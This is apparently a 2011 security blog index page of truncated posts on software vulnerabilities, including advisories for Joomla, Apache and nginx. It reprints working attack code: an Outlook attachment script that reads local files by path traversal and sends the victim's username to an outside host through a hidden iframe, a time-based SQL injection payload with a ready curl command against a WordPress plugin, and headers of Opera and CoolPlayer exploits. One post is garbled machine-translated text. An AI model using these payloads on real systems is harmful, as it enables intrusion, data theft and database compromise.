GO IT WORLD | IT TECH | IT NEWS » Application Security

Outlook vulnerability explain

jason — Wed, 09 Nov 2011 13:10:35 +0000

Send attenment demo.htm

Code:

<script>

xmlhttp=new ActiveXObject("Msxml2.XMLHTTP.3.0");

xmlhttp.open("GET","../../../../../../../../../../../../../../boot.ini",false);

xmlhttp.send();

alert(xmlhttp.responseText);

</script>

Information:

<script>alert(document.URL)</script>

Get dir info

C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\OLKxxx

Demo:

<script>

var path = document.URL;

var regx = /Settings\\(.*)\\Local/ var rs= regx.exec(path); username=rs[1];

iframe_dom("http://www.80vul.com/hackgame/xs-g0.php?username="+username);

function iframe_dom(script_filename) {

    var d = window.document;

    var newIframe = d.createElement('iframe');

    newIframe.src=script_filename;

    newIframe.style.width = 0;

    newIframe.style.height = 0;

    d.appendChild(newIframe);

    return false;

} </script>

Opera 10/11 (bad nesting with frameset tag) Memory Corruption

jason — Fri, 07 Oct 2011 12:56:46 +0000

################################################################### Exploit for Opera 10/11 (bad nesting with frameset tag) Memory Corruption
#
# Vulnerability:
#
# Discovered: 2010-08-18
# Patched: 2011-05-18
# Tested on: v10.xx (v10.00, v10.01, v10.10, v10.50, v10.51, v10.52, v10.53, v10.54, v10.6, v10.61, v10.62 and v10.63)
# v11.xx < v11.11 (v11.00, v11.01 and v11.10)
# Patched on: v11.11
#
# Exploit:
#
# Coded: 2010-09-23
# Last revision: 2011-09-30
#
# RCE on: v10.00, v10.50, v10.51, v10.52, v10.54, v10.60, v10.62, v11.00, v11.01 and v11.10*
# DoS on: v10.01, v10.10, v10.53, v10.61

… Read the rest

Joomla 1.7.0 is vulnerable to multiple Cross Site Scripting issues

jason — Mon, 03 Oct 2011 13:07:32 +0000

1. OVERVIEW

Joomla! 1.7.0 (stable version) is vulnerable to multiple Cross Site
Scripting issues.

2. BACKGROUND

Joomla is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets. It comprises a
model鈥搗iew鈥揷ontroller (MVC) Web application framework that can also be
used independently.
Joomla is written in PHP, uses object-oriented programming (OOP)
techniques and software design patterns, stores data in a MySQL
database, and includes features such as page caching, RSS feeds,
printable versions of pages, news flashes, blogs, polls, search, and
support… Read the rest

WordPress WP Bannerize plugin <= 2.8.7 SQL Injection Vulnerability

jason — Sun, 02 Oct 2011 11:11:40 +0000

# Exploit Title: WordPress WP Bannerize plugin <= 2.8.7 SQL Injection Vulnerability
# Date: 2011-09-22
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-bannerize.zip
# Version: 2.8.7 (tested)

—————
PoC (POST data)
—————
http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php
limit=1&offset=1&item[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

e.g.
curl –data "limit=1&offset=1&item[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)" -H "X-Requested-With:XMLHttpRequest" http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php

—————
Vulnerable code
—————
if ( @isset($_SERVER['HTTP_X_REQUESTED_WITH']) ) {
    …
    $limit = intval($_POST['limit']);
    $page_offset = (intval($_POST['offset']) – 1) * $limit;

… Read the rest

Mongodb Safety Study

jason — Sat, 03 Sep 2011 07:56:34 +0000

Mongodb, so long to fire the thing actually had a good look. Carefully until no time learn new things, always feel lack of energy. The advantage of buying a book on fragmented in the VPS on the build, test, to see the implementation code. Feeling quite interesting a database. Although the feeling it is very simple, especially when it is looking at the code feel so. But this is not what is another example of KISS, or something simple but useful most popular.

Since they saw their implementation, can not fail to output something. Just did not update the… Read the rest

Fix handling of byte-range requests to use less memory for apache2

jason — Wed, 31 Aug 2011 10:25:00 +0000

The Apache Software Foundation and the Apache HTTP Server Project are pleased to announce the release of version 2.2.20 of the Apache HTTP Server ("Apache"). This version of Apache is principally a security and bug fix release:

SECURITY: CVE-2011-3192 (cve.mitre.org) core: Fix handling of byte-range requests to use less memory, to avoid denial of service. If the sum of all ranges in a request is larger than the original file, ignore the ranges and send the complete file. PR 51714.

We consider this release to be the best version of Apache available, and encourage users… Read the rest

Possible Arbitrary Code Execution with Null Bytes, PHP, and Old Versions of nginx

jason — Fri, 26 Aug 2011 03:25:37 +0000

I came across a separate null-byte injection vulnerability in older versions of nginx (0.5.*, 0.6.*, 0.7 <= 0.7.65, 0.8 <= 0.8.37). By taking advantage of this vulnerability, an attacker can cause a server that uses PHP-FastCGI to execute any publicly accessible file on the server as PHP.

In vulnerable versions of nginx, null bytes are allowed in URIs by default (their presence is indicated via a variable named zero_in_uri defined in ngx_http_request.h). Individual modules have the ability to opt-out of handling URIs with null bytes. However, not all of them do; in particular, the FastCGI module does not.

The attack… Read the rest

CoolPlayer 219 Buffer Overflow Exploit

jason — Sat, 13 Aug 2011 02:25:13 +0000

# #########################################################################
#~ Title         : CoolPlayer 219 Buffer Overflow Exploit
#~ Software      : http://coolplayer.en.softonic.com/
#~ Tested on     : Windows XP SP3 English
#~ Date          : 04/07/2011
#~ Author        : X-h4ck
#~ Site          : http://www.pirate.al/ #PirateAL Crew , http://theflashcrew.blogspot.com/
#~ Email         : mem001@live.com
#~ Greetz        : Wulns~ – IllyrianWarrior – Danzel – Ace – M4yh3m – Saldeath – bi0 – Slimshaddy – d3trimentaL – Lekosta – Pretorian – CroSs(r00tworm) – Rigon
# #########################################################################

#!/usr/bin/python
print " CoolPlayer 219 Buffer Overflow Exploit"
print " Author : X-h4ck"

… Read the rest

PHP 5.3.3 GD extension imagepstext stack buffer overflow

jason — Wed, 15 Dec 2010 03:57:26 +0000

Description:

Prior to version 5.3.4, PHP’s GD extension did not properly validate
the number of anti-aliasing steps passed to the function imagepstext.
The value of this parameter is expected to be either 4 or 16. To
accommodate this, an array of 16 integers, aa, is located on the
stack. Before the number of steps is validated, it is used to populate
the array. This results in a stack-based buffer overflow.

Proof of concept:

<?php
$img = imagecreatetruecolor(1, 1); //Arbitrary
$fnt = imagepsloadfont("somefont.pfb"); //Arbitrary
//The final parameter is the number of anti-aliasing steps… Read the rest

Buffer Overflows exploit

jason — Mon, 06 Dec 2010 07:04:37 +0000

Buffer overflow vulnerabilities have been around since the early days of computers and still exist today. Most Internet worms use buffer overflow vulnerabilities to propagate, and even the most recent zero-day VML vulnerability in Internet Explorer is due to a buffer overflow.

C is a high-level programming language, but it assumes that the programmer is responsible for data integrity. If this responsibility were shifted over to the compiler, the resulting binaries would be significantly slower, due to integrity checks on every variable. Also, this would remove a significant level of control from the programmer… Read the rest